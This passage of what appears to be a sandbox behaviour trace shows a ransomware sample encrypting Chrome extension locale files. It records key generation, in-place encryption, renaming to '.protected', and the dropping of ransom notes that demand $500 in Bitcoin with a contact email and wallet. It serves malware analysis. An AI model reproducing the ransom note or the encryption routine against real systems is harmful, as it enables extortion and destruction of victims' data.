Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.protected") returned 165 [0080.489] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.protected")) returned 1 [0080.490] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.490] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.490] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\RESTORE_FILES.txt") returned 159 [0080.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.491] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.491] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.492] lstrlenA (lpString="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") returned 684 [0080.492] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.492] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.492] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.492] CloseHandle (hObject=0x164) returned 1 [0080.492] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.492] lstrcmpiW (lpString1="fr_CA", lpString2="Windows") returned -1 [0080.492] lstrcmpiW (lpString1="fr_CA", lpString2="Program Files") returned -1 [0080.492] lstrcmpiW (lpString1="fr_CA", lpString2="Program Files (x86)") returned -1 [0080.492] lstrcmpiW (lpString1="fr_CA", lpString2="$Recycle.bin") returned 1 [0080.492] lstrcmpiW (lpString1="fr_CA", lpString2="System Volume Information") returned -1 [0080.492] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA") returned 144 [0080.492] lstrcmpW (lpString1="fr_CA", lpString2=".") returned 1 [0080.492] lstrcmpW (lpString1="fr_CA", lpString2="..") returned 1 [0080.492] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\*") returned 146 [0080.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
returned 0x47bc10 [0080.493] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.493] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.493] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.493] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.493] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.493] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\.") returned 146 [0080.493] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.493] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.493] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.494] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.494] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.494] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.494] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.494] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\..") returned 147 [0080.494] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.494] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.494] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.494] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.494] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.494] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0080.494] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.494] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.494] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json") returned 158 [0080.494] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.494] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.494] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.494] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json") returned 158 [0080.495] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json") returned 158 [0080.495] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json") returned 158 [0080.495] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.495] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0080.496] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.496] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0080.496] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.496] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.497] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.497] CloseHandle (hObject=0x168) returned 1 [0080.497] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.protected") returned 168 [0080.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json.protected")) returned 1 [0080.498] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.498] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.498] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\RESTORE_FILES.txt") returned 162 [0080.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0080.498] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.498] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.499] lstrlenA (lpString="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") returned 684 [0080.499] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0080.499] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.499] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.499] CloseHandle (hObject=0x164) returned 1 [0080.499] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.499] lstrcmpiW (lpString1="gl", lpString2="Windows") returned -1 [0080.499] lstrcmpiW (lpString1="gl", lpString2="Program Files") returned -1 [0080.499] lstrcmpiW (lpString1="gl", lpString2="Program Files (x86)") returned -1 [0080.499] lstrcmpiW (lpString1="gl", lpString2="$Recycle.bin") returned 1 [0080.499] lstrcmpiW (lpString1="gl", lpString2="System Volume Information") returned -1 [0080.499] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl") returned 141 [0080.499] lstrcmpW (lpString1="gl", lpString2=".") returned 1 [0080.499] lstrcmpW (lpString1="gl", lpString2="..") returned 1 [0080.499] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\*") returned 143 [0080.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0080.500] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.500] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.500] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.500] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.500] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\.") returned 143 [0080.500] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.500] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.500] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.500] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.500] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.500] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.500] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\..") returned 144 [0080.500] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.500] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.500] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.500] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.500] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.500] lstrcmpiW (lpString1="messages.json", lpString2="Program Files 
(x86)") returned -1 [0080.500] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.500] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json") returned 155 [0080.500] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.500] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.500] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.500] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json") returned 155 [0080.501] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json") returned 155 [0080.501] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json") returned 155 [0080.501] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.501] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xac, lpOverlapped=0x0) returned 1 [0080.502] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.502] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xac, lpOverlapped=0x0) returned 1 [0080.502] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.502] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.502] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.502] CloseHandle (hObject=0x168) returned 1 [0080.502] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.protected") returned 165 [0080.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.protected")) returned 1 [0080.503] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.503] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.503] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\RESTORE_FILES.txt") returned 159 [0080.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.503] lstrlenA 
